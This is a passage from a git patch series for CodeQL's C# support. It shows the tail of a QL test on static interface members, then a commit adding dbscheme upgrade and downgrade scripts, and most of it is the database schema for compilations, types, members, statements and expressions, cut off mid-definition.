i.getFile().getStem() = "StaticInterfaceMembers" and + i.getName() = interface and + m = i.getAMember() and + modifier = m.getAModifier().getName() + ) +} + +query predicate implements(Overridable o, Virtualizable v) { + v.getFile().getStem() = "StaticInterfaceMembers" and + (v.isVirtual() or v.isAbstract()) and + v.isStatic() and + v.getAnImplementor() = o +} From 2f602a629f4a3c5c702cbb4abdd75647f3222909 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Mon, 16 Jan 2023 13:27:37 +0100 Subject: [PATCH 290/381] C#: Add upgrade and downgrade scripts. --- .../old.dbscheme | 2069 +++++++++++++++++ .../semmlecode.csharp.dbscheme | 2069 +++++++++++++++++ .../upgrade.properties | 2 + .../old.dbscheme | 2069 +++++++++++++++++ .../semmlecode.csharp.dbscheme | 2069 +++++++++++++++++ .../upgrade.properties | 2 + 6 files changed, 8280 insertions(+) create mode 100644 csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/old.dbscheme create mode 100644 csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/semmlecode.csharp.dbscheme create mode 100644 csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/upgrade.properties create mode 100644 csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/old.dbscheme create mode 100644 csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/semmlecode.csharp.dbscheme create mode 100644 csharp/ql/lib/upgrades/d0fba103f7dee477dd7d9f6c038518b3f683b2c7/upgrade.properties diff --git a/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/old.dbscheme b/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/old.dbscheme new file mode 100644 index 00000000000..1136957c0b3 --- /dev/null +++ b/csharp/downgrades/1136957c0b3c73a7798ae42645c361e813295393/old.dbscheme @@ -0,0 +1,2069 @@ +/* This is a dummy line to alter the dbscheme, so we can make a database upgrade + * without actually changing any of the dbscheme predicates. It contains a date + * to allow for such updates in the future as well. + * + * 2021-07-14 + * + * DO NOT remove this comment carelessly, since it can revert the dbscheme back to a + * previously seen state (matching a previously seen SHA), which would make the upgrade + * mechanism not work properly. + */ + +/** + * An invocation of the compiler. Note that more than one file may be + * compiled per invocation. For example, this command compiles three + * source files: + * + * csc f1.cs f2.cs f3.cs + * + * The `id` simply identifies the invocation, while `cwd` is the working + * directory from which the compiler was invoked. + */ +compilations( + unique int id : @compilation, + string cwd : string ref +); + +/** + * The arguments that were passed to the extractor for a compiler + * invocation. If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then typically there will be rows for + * + * num | arg + * --- | --- + * 0 | --compiler + * 1 | *path to compiler* + * 2 | f1.cs + * 3 | f2.cs + * 4 | f3.cs + */ +#keyset[id, num] +compilation_args( + int id : @compilation ref, + int num : int ref, + string arg : string ref +); + +/** + * The source files that are compiled by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | f1.cs + * 1 | f2.cs + * 2 | f3.cs + */ +#keyset[id, num] +compilation_compiling_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The references used by a compiler invocation. + * If `id` is for the compiler invocation + * + * csc f1.cs f2.cs f3.cs /r:ref1.dll /r:ref2.dll /r:ref3.dll + * + * then there will be rows for + * + * num | arg + * --- | --- + * 0 | ref1.dll + * 1 | ref2.dll + * 2 | ref3.dll + */ +#keyset[id, num] +compilation_referencing_files( + int id : @compilation ref, + int num : int ref, + int file : @file ref +); + +/** + * The time taken by the extractor for a compiler invocation. + * + * For each file `num`, there will be rows for + * + * kind | seconds + * ---- | --- + * 1 | CPU seconds used by the extractor frontend + * 2 | Elapsed seconds during the extractor frontend + * 3 | CPU seconds used by the extractor backend + * 4 | Elapsed seconds during the extractor backend + */ +#keyset[id, num, kind] +compilation_time( + int id : @compilation ref, + int num : int ref, + /* kind: + 1 = frontend_cpu_seconds + 2 = frontend_elapsed_seconds + 3 = extractor_cpu_seconds + 4 = extractor_elapsed_seconds + */ + int kind : int ref, + float seconds : float ref +); + +/** + * An error or warning generated by the extractor. + * The diagnostic message `diagnostic` was generated during compiler + * invocation `compilation`, and is the `file_number_diagnostic_number`th + * message generated while extracting the `file_number`th file of that + * invocation. + */ +#keyset[compilation, file_number, file_number_diagnostic_number] +diagnostic_for( + unique int diagnostic : @diagnostic ref, + int compilation : @compilation ref, + int file_number : int ref, + int file_number_diagnostic_number : int ref +); + +diagnostics( + unique int id: @diagnostic, + int severity: int ref, + string error_tag: string ref, + string error_message: string ref, + string full_error_message: string ref, + int location: @location_default ref +); + +extractor_messages( + unique int id: @extractor_message, + int severity: int ref, + string origin : string ref, + string text : string ref, + string entity : string ref, + int location: @location_default ref, + string stack_trace : string ref +); + +/** + * If extraction was successful, then `cpu_seconds` and + * `elapsed_seconds` are the CPU time and elapsed time (respectively) + * that extraction took for compiler invocation `id`. + */ +compilation_finished( + unique int id : @compilation ref, + float cpu_seconds : float ref, + float elapsed_seconds : float ref +); + +compilation_assembly( + unique int id : @compilation ref, + int assembly: @assembly ref +) + +// Populated by the CSV extractor +externalData( + int id: @externalDataElement, + string path: string ref, + int column: int ref, + string value: string ref); + +sourceLocationPrefix( + string prefix: string ref); + +/* + * C# dbscheme + */ + +/** ELEMENTS **/ + +@element = @declaration | @stmt | @expr | @modifier | @attribute | @namespace_declaration + | @using_directive | @type_parameter_constraints | @externalDataElement + | @xmllocatable | @asp_element | @namespace | @preprocessor_directive; + +@declaration = @callable | @generic | @assignable | @namespace; + +@named_element = @namespace | @declaration; + +@declaration_with_accessors = @property | @indexer | @event; + +@assignable = @variable | @assignable_with_accessors | @event; + +@assignable_with_accessors = @property | @indexer; + +@attributable = @assembly | @field | @parameter | @operator | @method | @constructor + | @destructor | @callable_accessor | @value_or_ref_type | @declaration_with_accessors + | @local_function | @lambda_expr; + +/** LOCATIONS, ASEMMBLIES, MODULES, FILES and FOLDERS **/ + +@location = @location_default | @assembly; + +locations_default( + unique int id: @location_default, + int file: @file ref, + int beginLine: int ref, + int beginColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +locations_mapped( + unique int id: @location_default ref, + int mapped_to: @location_default ref); + +@sourceline = @file | @callable | @xmllocatable; + +numlines( + int element_id: @sourceline ref, + int num_lines: int ref, + int num_code: int ref, + int num_comment: int ref); + +assemblies( + unique int id: @assembly, + int file: @file ref, + string fullname: string ref, + string name: string ref, + string version: string ref); + +files( + unique int id: @file, + string name: string ref); + +folders( + unique int id: @folder, + string name: string ref); + +@container = @folder | @file ; + +containerparent( + int parent: @container ref, + unique int child: @container ref); + +file_extraction_mode( + unique int file: @file ref, + int mode: int ref + /* 0 = normal, 1 = standalone extractor */ + ); + +/** NAMESPACES **/ + +@type_container = @namespace | @type; + +namespaces( + unique int id: @namespace, + string name: string ref); + +namespace_declarations( + unique int id: @namespace_declaration, + int namespace_id: @namespace ref); + +namespace_declaration_location( + unique int id: @namespace_declaration ref, + int loc: @location ref); + +parent_namespace( + unique int child_id: @type_container ref, + int namespace_id: @namespace ref); + +@declaration_or_directive = @namespace_declaration | @type | @using_directive; + +parent_namespace_declaration( + int child_id: @declaration_or_directive ref, // cannot be unique because of partial classes + int namespace_id: @namespace_declaration ref); + +@using_directive = @using_namespace_directive | @using_static_directive; + +using_global( + unique int id: @using_directive ref +); + +using_namespace_directives( + unique int id: @using_namespace_directive, + int namespace_id: @namespace ref); + +using_static_directives( + unique int id: @using_static_directive, + int type_id: @type_or_ref ref); + +using_directive_location( + unique int id: @using_directive ref, + int loc: @location ref); + +@preprocessor_directive = @pragma_warning | @pragma_checksum | @directive_define | @directive_undefine | @directive_warning + | @directive_error | @directive_nullable | @directive_line | @directive_region | @directive_endregion | @directive_if + | @directive_elif | @directive_else | @directive_endif; + +@conditional_directive = @directive_if | @directive_elif; +@branch_directive = @directive_if | @directive_elif | @directive_else; + +directive_ifs( + unique int id: @directive_if, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref); /* 0: false, 1: true */ + +directive_elifs( + unique int id: @directive_elif, + int branchTaken: int ref, /* 0: false, 1: true */ + int conditionValue: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +directive_elses( + unique int id: @directive_else, + int branchTaken: int ref, /* 0: false, 1: true */ + int parent: @directive_if ref, + int index: int ref); + +#keyset[id, start] +directive_endifs( + unique int id: @directive_endif, + unique int start: @directive_if ref); + +directive_define_symbols( + unique int id: @define_symbol_expr ref, + string name: string ref); + +directive_regions( + unique int id: @directive_region, + string name: string ref); + +#keyset[id, start] +directive_endregions( + unique int id: @directive_endregion, + unique int start: @directive_region ref); + +directive_lines( + unique int id: @directive_line, + int kind: int ref); /* 0: default, 1: hidden, 2: numeric, 3: span */ + +directive_line_value( + unique int id: @directive_line ref, + int line: int ref); + +directive_line_file( + unique int id: @directive_line ref, + int file: @file ref); + +directive_line_offset( + unique int id: @directive_line ref, + int offset: int ref); + +directive_line_span( + unique int id: @directive_line ref, + int startLine: int ref, + int startColumn: int ref, + int endLine: int ref, + int endColumn: int ref); + +directive_nullables( + unique int id: @directive_nullable, + int setting: int ref, /* 0: disable, 1: enable, 2: restore */ + int target: int ref); /* 0: none, 1: annotations, 2: warnings */ + +directive_warnings( + unique int id: @directive_warning, + string message: string ref); + +directive_errors( + unique int id: @directive_error, + string message: string ref); + +directive_undefines( + unique int id: @directive_undefine, + string name: string ref); + +directive_defines( + unique int id: @directive_define, + string name: string ref); + +pragma_checksums( + unique int id: @pragma_checksum, + int file: @file ref, + string guid: string ref, + string bytes: string ref); + +pragma_warnings( + unique int id: @pragma_warning, + int kind: int ref /* 0 = disable, 1 = restore */); + +#keyset[id, index] +pragma_warning_error_codes( + int id: @pragma_warning ref, + string errorCode: string ref, + int index: int ref); + +preprocessor_directive_location( + unique int id: @preprocessor_directive ref, + int loc: @location ref); + +preprocessor_directive_compilation( + unique int id: @preprocessor_directive ref, + int compilation: @compilation ref); + +preprocessor_directive_active( + unique int id: @preprocessor_directive ref, + int active: int ref); /* 0: false, 1: true */ + +/** TYPES **/ + +types( + unique int id: @type, + int kind: int ref, + string name: string ref); + +case @type.kind of + 1 = @bool_type +| 2 = @char_type +| 3 = @decimal_type +| 4 = @sbyte_type +| 5 = @short_type +| 6 = @int_type +| 7 = @long_type +| 8 = @byte_type +| 9 = @ushort_type +| 10 = @uint_type +| 11 = @ulong_type +| 12 = @float_type +| 13 = @double_type +| 14 = @enum_type +| 15 = @struct_type +| 17 = @class_type +| 19 = @interface_type +| 20 = @delegate_type +| 21 = @null_type +| 22 = @type_parameter +| 23 = @pointer_type +| 24 = @nullable_type +| 25 = @array_type +| 26 = @void_type +| 27 = @int_ptr_type +| 28 = @uint_ptr_type +| 29 = @dynamic_type +| 30 = @arglist_type +| 31 = @unknown_type +| 32 = @tuple_type +| 33 = @function_pointer_type + ; + +@simple_type = @bool_type | @char_type | @integral_type | @floating_point_type | @decimal_type; +@integral_type = @signed_integral_type | @unsigned_integral_type; +@signed_integral_type = @sbyte_type | @short_type | @int_type | @long_type; +@unsigned_integral_type = @byte_type | @ushort_type | @uint_type | @ulong_type; +@floating_point_type = @float_type | @double_type; +@value_type = @simple_type | @enum_type | @struct_type | @nullable_type | @int_ptr_type + | @uint_ptr_type | @tuple_type; +@ref_type = @class_type | @interface_type | @array_type | @delegate_type | @null_type + | @dynamic_type; +@value_or_ref_type = @value_type | @ref_type; + +typerefs( + unique int id: @typeref, + string name: string ref); + +typeref_type( + int id: @typeref ref, + unique int typeId: @type ref); + +@type_or_ref = @type | @typeref; + +array_element_type( + unique int array: @array_type ref, + int dimension: int ref, + int rank: int ref, + int element: @type_or_ref ref); + +nullable_underlying_type( + unique int nullable: @nullable_type ref, + int underlying: @type_or_ref ref); + +pointer_referent_type( + unique int pointer: @pointer_type ref, + int referent: @type_or_ref ref); + +enum_underlying_type( + unique int enum_id: @enum_type ref, + int underlying_type_id: @type_or_ref ref); + +delegate_return_type( + unique int delegate_id: @delegate_type ref, + int return_type_id: @type_or_ref ref); + +function_pointer_return_type( + unique int function_pointer_id: @function_pointer_type ref, + int return_type_id: @type_or_ref ref); + +extend( + int sub: @type ref, + int super: @type_or_ref ref); + +anonymous_types( + unique int id: @type ref); + +@interface_or_ref = @interface_type | @typeref; + +implement( + int sub: @type ref, + int super: @type_or_ref ref); + +type_location( + int id: @type ref, + int loc: @location ref); + +tuple_underlying_type( + unique int tuple: @tuple_type ref, + int struct: @type_or_ref ref); + +#keyset[tuple, index] +tuple_element( + int tuple: @tuple_type ref, + int index: int ref, + unique int field: @field ref); + +attributes( + unique int id: @attribute, + int kind: int ref, + int type_id: @type_or_ref ref, + int target: @attributable ref); + +case @attribute.kind of + 0 = @attribute_default +| 1 = @attribute_return +| 2 = @attribute_assembly +| 3 = @attribute_module +; + +attribute_location( + int id: @attribute ref, + int loc: @location ref); + +@type_mention_parent = @element | @type_mention; + +type_mention( + unique int id: @type_mention, + int type_id: @type_or_ref ref, + int parent: @type_mention_parent ref); + +type_mention_location( + unique int id: @type_mention ref, + int loc: @location ref); + +@has_type_annotation = @assignable | @type_parameter | @callable | @expr | @delegate_type | @generic | @function_pointer_type; + +/** + * A direct annotation on an entity, for example `string? x;`. + * + * Annotations: + * 2 = reftype is not annotated "!" + * 3 = reftype is annotated "?" + * 4 = readonly ref type / in parameter + * 5 = ref type parameter, return or local variable + * 6 = out parameter + * + * Note that the annotation depends on the element it annotates. + * @assignable: The annotation is on the type of the assignable, for example the variable type. + * @type_parameter: The annotation is on the reftype constraint + * @callable: The annotation is on the return type + * @array_type: The annotation is on the element type + */ +type_annotation(int id: @has_type_annotation ref, int annotation: int ref); + +nullability(unique int nullability: @nullability, int kind: int ref); + +case @nullability.kind of + 0 = @oblivious +| 1 = @not_annotated +| 2 = @annotated +; + +#keyset[parent, index] +nullability_parent(int nullability: @nullability ref, int index: int ref, int parent: @nullability ref) + +type_nullability(int id: @has_type_annotation ref, int nullability: @nullability ref); + +/** + * The nullable flow state of an expression, as determined by Roslyn. + * 0 = none (default, not populated) + * 1 = not null + * 2 = maybe null + */ +expr_flowstate(unique int id: @expr ref, int state: int ref); + +/** GENERICS **/ + +@generic = @type | @method | @local_function; + +type_parameters( + unique int id: @type_parameter ref, + int index: int ref, + int generic_id: @generic ref, + int variance: int ref /* none = 0, out = 1, in = 2 */); + +#keyset[constructed_id, index] +type_arguments( + int id: @type_or_ref ref, + int index: int ref, + int constructed_id: @generic_or_ref ref); + +@generic_or_ref = @generic | @typeref; + +constructed_generic( + unique int constructed: @generic ref, + int generic: @generic_or_ref ref); + +type_parameter_constraints( + unique int id: @type_parameter_constraints, + int param_id: @type_parameter ref); + +type_parameter_constraints_location( + int id: @type_parameter_constraints ref, + int loc: @location ref); + +general_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int kind: int ref /* class = 1, struct = 2, new = 3 */); + +specific_type_parameter_constraints( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref); + +specific_type_parameter_nullability( + int id: @type_parameter_constraints ref, + int base_id: @type_or_ref ref, + int nullability: @nullability ref); + +/** FUNCTION POINTERS */ + +function_pointer_calling_conventions( + int id: @function_pointer_type ref, + int kind: int ref); + +#keyset[id, index] +has_unmanaged_calling_conventions( + int id: @function_pointer_type ref, + int index: int ref, + int conv_id: @type_or_ref ref); + +/** MODIFIERS */ + +@modifiable = @modifiable_direct | @event_accessor; + +@modifiable_direct = @member | @accessor | @local_function | @anonymous_function_expr; + +modifiers( + unique int id: @modifier, + string name: string ref); + +has_modifiers( + int id: @modifiable_direct ref, + int mod_id: @modifier ref); + +compiler_generated(unique int id: @modifiable ref); + +/** MEMBERS **/ + +@member = @method | @constructor | @destructor | @field | @property | @event | @operator | @indexer | @type; + +@named_exprorstmt = @goto_stmt | @labeled_stmt | @expr; + +@virtualizable = @method | @property | @indexer | @event | @operator; + +exprorstmt_name( + unique int parent_id: @named_exprorstmt ref, + string name: string ref); + +nested_types( + unique int id: @type ref, + int declaring_type_id: @type ref, + int unbound_id: @type ref); + +properties( + unique int id: @property, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @property ref); + +property_location( + int id: @property ref, + int loc: @location ref); + +indexers( + unique int id: @indexer, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @indexer ref); + +indexer_location( + int id: @indexer ref, + int loc: @location ref); + +accessors( + unique int id: @accessor, + int kind: int ref, + string name: string ref, + int declaring_member_id: @member ref, + int unbound_id: @accessor ref); + +case @accessor.kind of + 1 = @getter +| 2 = @setter + ; + +init_only_accessors( + unique int id: @accessor ref); + +accessor_location( + int id: @accessor ref, + int loc: @location ref); + +events( + unique int id: @event, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @event ref); + +event_location( + int id: @event ref, + int loc: @location ref); + +event_accessors( + unique int id: @event_accessor, + int kind: int ref, + string name: string ref, + int declaring_event_id: @event ref, + int unbound_id: @event_accessor ref); + +case @event_accessor.kind of + 1 = @add_event_accessor +| 2 = @remove_event_accessor + ; + +event_accessor_location( + int id: @event_accessor ref, + int loc: @location ref); + +operators( + unique int id: @operator, + string name: string ref, + string symbol: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @operator ref); + +operator_location( + int id: @operator ref, + int loc: @location ref); + +constant_value( + int id: @variable ref, + string value: string ref); + +/** CALLABLES **/ + +@callable = @method | @constructor | @destructor | @operator | @callable_accessor | @anonymous_function_expr | @local_function; + +@callable_accessor = @accessor | @event_accessor; + +methods( + unique int id: @method, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @method ref); + +method_location( + int id: @method ref, + int loc: @location ref); + +constructors( + unique int id: @constructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @constructor ref); + +constructor_location( + int id: @constructor ref, + int loc: @location ref); + +destructors( + unique int id: @destructor, + string name: string ref, + int declaring_type_id: @type ref, + int unbound_id: @destructor ref); + +destructor_location( + int id: @destructor ref, + int loc: @location ref); + +overrides( + int id: @callable ref, + int base_id: @callable ref); + +explicitly_implements( + int id: @member ref, + int interface_id: @interface_or_ref ref); + +local_functions( + unique int id: @local_function, + string name: string ref, + int return_type: @type ref, + int unbound_id: @local_function ref); + +local_function_stmts( + unique int fn: @local_function_stmt ref, + int stmt: @local_function ref); + +/** VARIABLES **/ + +@variable = @local_scope_variable | @field; + +@local_scope_variable = @local_variable | @parameter; + +fields( + unique int id: @field, + int kind: int ref, + string name: string ref, + int declaring_type_id: @type ref, + int type_id: @type_or_ref ref, + int unbound_id: @field ref); + +case @field.kind of + 1 = @addressable_field +| 2 = @constant + ; + +field_location( + int id: @field ref, + int loc: @location ref); + +localvars( + unique int id: @local_variable, + int kind: int ref, + string name: string ref, + int implicitly_typed: int ref /* 0 = no, 1 = yes */, + int type_id: @type_or_ref ref, + int parent_id: @local_var_decl_expr ref); + +case @local_variable.kind of + 1 = @addressable_local_variable +| 2 = @local_constant +| 3 = @local_variable_ref + ; + +localvar_location( + unique int id: @local_variable ref, + int loc: @location ref); + +@parameterizable = @callable | @delegate_type | @indexer | @function_pointer_type; + +#keyset[name, parent_id] +#keyset[index, parent_id] +params( + unique int id: @parameter, + string name: string ref, + int type_id: @type_or_ref ref, + int index: int ref, + int mode: int ref, /* value = 0, ref = 1, out = 2, array = 3, this = 4 */ + int parent_id: @parameterizable ref, + int unbound_id: @parameter ref); + +param_location( + int id: @parameter ref, + int loc: @location ref); + +/** STATEMENTS **/ + +@exprorstmt_parent = @control_flow_element | @top_level_exprorstmt_parent; + +statements( + unique int id: @stmt, + int kind: int ref); + +#keyset[index, parent] +stmt_parent( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_stmt_parent = @callable; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +stmt_parent_top_level( + unique int stmt: @stmt ref, + int index: int ref, + int parent: @top_level_stmt_parent ref); + +case @stmt.kind of + 1 = @block_stmt +| 2 = @expr_stmt +| 3 = @if_stmt +| 4 = @switch_stmt +| 5 = @while_stmt +| 6 = @do_stmt +| 7 = @for_stmt +| 8 = @foreach_stmt +| 9 = @break_stmt +| 10 = @continue_stmt +| 11 = @goto_stmt +| 12 = @goto_case_stmt +| 13 = @goto_default_stmt +| 14 = @throw_stmt +| 15 = @return_stmt +| 16 = @yield_stmt +| 17 = @try_stmt +| 18 = @checked_stmt +| 19 = @unchecked_stmt +| 20 = @lock_stmt +| 21 = @using_block_stmt +| 22 = @var_decl_stmt +| 23 = @const_decl_stmt +| 24 = @empty_stmt +| 25 = @unsafe_stmt +| 26 = @fixed_stmt +| 27 = @label_stmt +| 28 = @catch +| 29 = @case_stmt +| 30 = @local_function_stmt +| 31 = @using_decl_stmt + ; + +@using_stmt = @using_block_stmt | @using_decl_stmt; + +@labeled_stmt = @label_stmt | @case; + +@decl_stmt = @var_decl_stmt | @const_decl_stmt | @using_decl_stmt; + +@cond_stmt = @if_stmt | @switch_stmt; + +@loop_stmt = @while_stmt | @do_stmt | @for_stmt | @foreach_stmt; + +@jump_stmt = @break_stmt | @goto_any_stmt | @continue_stmt | @throw_stmt | @return_stmt + | @yield_stmt; + +@goto_any_stmt = @goto_default_stmt | @goto_case_stmt | @goto_stmt; + + +stmt_location( + unique int id: @stmt ref, + int loc: @location ref); + +catch_type( + unique int catch_id: @catch ref, + int type_id: @type_or_ref ref, + int kind: int ref /* explicit = 1, implicit = 2 */); + +foreach_stmt_info( + unique int id: @foreach_stmt ref, + int kind: int ref /* non-async = 1, async = 2 */); + +@foreach_symbol = @method | @property | @type_or_ref; + +#keyset[id, kind] +foreach_stmt_desugar( + int id: @foreach_stmt ref, + int symbol: @foreach_symbol ref, + int kind: int ref /* GetEnumeratorMethod = 1, CurrentProperty = 2, MoveNextMethod = 3, DisposeMethod = 4, ElementType = 5 */); + +/** EXPRESSIONS **/ + +expressions( + unique int id: @expr, + int kind: int ref, + int type_id: @type_or_ref ref); + +#keyset[index, parent] +expr_parent( + unique int expr: @expr ref, + int index: int ref, + int parent: @control_flow_element ref); + +@top_level_expr_parent = @attribute | @field | @property | @indexer | @parameter | @directive_if | @directive_elif; + +@top_level_exprorstmt_parent = @top_level_expr_parent | @top_level_stmt_parent; + +// [index, parent] is not a keyset because the same parent may be compiled multiple times +expr_parent_top_level( + unique int expr: @expr ref, + int index: int ref, + int parent: @top_level_exprorstmt_parent ref); + +case @expr.kind of +/* literal */ + 1 = @bool_literal_expr +| 2 = @char_literal_expr +| 3 = @decimal_literal_expr +| 4 = @int_literal_expr +| 5 = @long_literal_expr +| 6 = @uint_literal_expr +| 7 = @ulong_literal_expr +| 8 = @float_literal_expr +| 9 = @double_literal_expr +| 10 = @string_literal_expr +| 11 = @null_literal_expr +/* primary & unary */ +| 12 = @this_access_expr +| 13 = @base_access_expr +| 14 = @local_variable_access_expr +| 15 = @parameter_access_expr +| 16 = @field_access_expr +| 17 = @property_access_expr +| 18 = @method_access_expr +| 19 = @event_access_expr +| 20 = @indexer_access_expr +| 21 = @array_access_expr +| 22 = @type_access_expr +| 23 = @typeof_expr +| 24 = @method_invocation_expr +| 25 = @delegate_invocation_expr +| 26 = @operator_invocation_expr +| 27 = @cast_expr +| 28 = @object_creation_expr +| 29 = @explicit_delegate_creation_expr +| 30 = @implicit_delegate_creation_expr +| 31 = @array_creation_expr +| 32 = @default_expr +| 33 = @plus_expr +| 34 = @minus_expr +| 35 = @bit_not_expr +| 36 = @log_not_expr +| 37 = @post_incr_expr +| 38 = @post_decr_expr +| 39 = @pre_incr_expr +| 40 = @pre_decr_expr +/* multiplicative */ +| 41 = @mul_expr +| 42 = @div_expr +| 43 = @rem_expr +/* additive */ +| 44 = @add_expr +| 45 = @sub_expr +/* shift */ +| 46 = @lshift_expr +| 47 = @rshift_expr +/* relational */ +| 48 = @lt_expr +| 49 = @gt_expr +| 50 = @le_expr +| 51 = @ge_expr +/* equality */ +| 52 = @eq_expr +| 53 = @ne_expr +/* logical */ +| 54 = @bit_and_expr +| 55 = @bit_xor_expr +| 56 = @bit_or_expr +| 57 = @log_and_expr +| 58 = @log_or_expr +/* type testing */ +| 59 = @is_expr +| 60 = @as_expr +/* null coalescing */ +| 61 = @null_coalescing_expr +/* conditional */ +| 62 = @conditional_expr +/* assignment */ +| 63 = @simple_assign_expr +| 64 = @assign_add_expr +| 65 = @assign_sub_expr +| 66 = @assign_mul_expr +| 67 = @assign_div_expr +| 68 = @assign_rem_expr +| 69 = @assign_and_expr +| 70 = @assign_xor_expr +| 71 = @assign_or_expr +| 72 = @assign_lshift_expr +| 73 = @assign_rshift_expr +/* more */ +| 74 = @object_init_expr +| 75 = @collection_init_expr +| 76 = @array_init_expr +| 77 = @checked_expr +| 78 = @unchecked_expr +| 79 = @constructor_init_expr +| 80 = @add_event_expr +| 81 = @remove_event_expr +| 82 = @par_expr +| 83 = @local_var_decl_expr +| 84 = @lambda_expr +| 85 = @anonymous_method_expr +| 86 = @namespace_expr +/* dynamic */ +| 92 = @dynamic_element_access_expr +| 93 = @dynamic_member_access_expr +/* unsafe */ +| 100 = @pointer_indirection_expr +| 101 = @address_of_expr +| 102 = @sizeof_expr +/* async */ +| 103 = @await_expr +/* C# 6.0 */ +| 104 = @nameof_expr +| 105 = @interpolated_string_expr +| 106 = @unknown_expr +/* C# 7.0 */ +| 107 = @throw_expr +| 108 = @tuple_expr +| 109 = @local_function_invocation_expr +| 110 = @ref_expr +| 111 = @discard_expr +/* C# 8.0 */ +| 112 = @range_expr +| 113 = @index_expr +| 114 = @switch_expr +| 115 = @recursive_pattern_expr +| 116 = @property_pattern_expr +| 117 = @positional_pattern_expr +| 118 = @switch_case_expr +| 119 = @assign_coalesce_expr +| 120 = @suppress_nullable_warning_expr +| 121 = @namespace_access_expr +/* C# 9.0 */ +| 122 = @lt_pattern_expr +| 123 = @gt_pattern_expr +| 124 = @le_pattern_expr +| 125 = @ge_pattern_expr +| 126 = @not_pattern_expr +| 127 = @and_pattern_expr +| 128 = @or_pattern_expr +| 129 = @function_pointer_invocation_expr +| 130 = @with_expr +/* C# 11.0 */ +| 131 = @list_pattern_expr +| 132 = @slice_pattern_expr +| 133 = @urshift_expr +| 134 = @assign_urshift_expr +/* Preprocessor */ +| 999 = @define_symbol_expr +; + +@switch = @switch_stmt | @switch_expr; +@case = @case_stmt | @switch_case_expr; +@pattern_match = @case | @is_expr; +@unary_pattern_expr = @not_pattern_expr; +@relational_pattern_expr = @gt_pattern_expr | @lt_pattern_expr | @ge_pattern_expr | @le_pattern_expr; +@binary_pattern_expr = @and_pattern_expr | @or_pattern_expr; + +@integer_literal_expr = @int_literal_expr | @long_literal_expr | @uint_literal_expr | @ulong_literal_expr; +@real_literal_expr = @float_literal_expr | @double_literal_expr | @decimal_literal_expr; +@literal_expr = @bool_literal_expr | @char_literal_expr | @integer_literal_expr | @real_literal_expr + | @string_literal_expr | @null_literal_expr; + +@assign_expr = @simple_assign_expr | @assign_op_expr | @local_var_decl_expr; +@assign_op_expr = @assign_arith_expr | @assign_bitwise_expr | @assign_event_expr | @assign_coalesce_expr; +@assign_event_expr = @add_event_expr | @remove_event_expr; + +@assign_arith_expr = @assign_add_expr | @assign_sub_expr | @assign_mul_expr | @assign_div_expr + | @assign_rem_expr +@assign_bitwise_expr = @assign_and_expr | @assign_or_expr | @assign_xor_expr + | @assign_lshift_expr | @assign_rshift_expr | @assign_urshift_expr; + +@member_access_expr = @field_access_expr | @property_access_expr | @indexer_access_expr | @event_access_expr + | @method_access_expr | @type_access_expr | @dynamic_member_access_expr; +@access_expr = @member_access_expr | @this_access_expr | @base_access_expr | @assignable_access_expr | @namespace_access_expr; +@element_access_expr = @indexer_access_expr | @array_access_expr | @dynamic_element_access_expr; + +@local_variable_access = @local_variable_access_expr | @local_var_decl_expr; +@local_scope_variable_access_expr = @parameter_access_expr | @local_variable_access; +@variable_access_expr = @local_scope_variable_access_expr | @field_access_expr; + +@assignable_access_expr = @variable_access_expr | @property_access_expr | @element_access_expr + | @event_access_expr | @dynamic_member_access_expr; + +@objectorcollection_init_expr = @object_init_expr | @collection_init_expr; + +@delegate_creation_expr = @explicit_delegate_creation_expr | @implicit_delegate_creation_expr; + +@bin_arith_op_expr = @mul_expr | @div_expr | @rem_expr | @add_expr | @sub_expr; +@incr_op_expr = @pre_incr_expr | @post_incr_expr; +@decr_op_expr = @pre_decr_expr | @post_decr_expr; +@mut_op_expr = @incr_op_expr | @decr_op_expr; +@un_arith_op_expr = @plus_expr | @minus_expr | @mut_op_expr; +@arith_op_expr = @bin_arith_op_expr | @un_arith_op_expr; + +@ternary_log_op_expr = @conditional_expr; +@bin_log_op_expr = @log_and_expr | @log_or_expr | @null_coalescing_expr; +@un_log_op_expr = @log_not_expr; +@log_expr = @un_log_op_expr | @bin_log_op_expr | @ternary_log_op_expr; + +@bin_bit_op_expr = @bit_and_expr | @bit_or_expr | @bit_xor_expr | @lshift_expr + | @rshift_expr | @urshift_expr; +@un_bit_op_expr = @bit_not_expr; +@bit_expr = @un_bit_op_expr | @bin_bit_op_expr; + +@equality_op_expr = @eq_expr | @ne_expr; +@rel_op_expr = @gt_expr | @lt_expr| @ge_expr | @le_expr; +@comp_expr = @equality_op_expr | @rel_op_expr; + +@op_expr = @assign_expr | @un_op | @bin_op | @ternary_op; + +@ternary_op = @ternary_log_op_expr; +@bin_op = @bin_arith_op_expr | @bin_log_op_expr | @bin_bit_op_expr | @comp_expr; +@un_op = @un_arith_op_expr | @un_log_op_expr | @un_bit_op_expr | 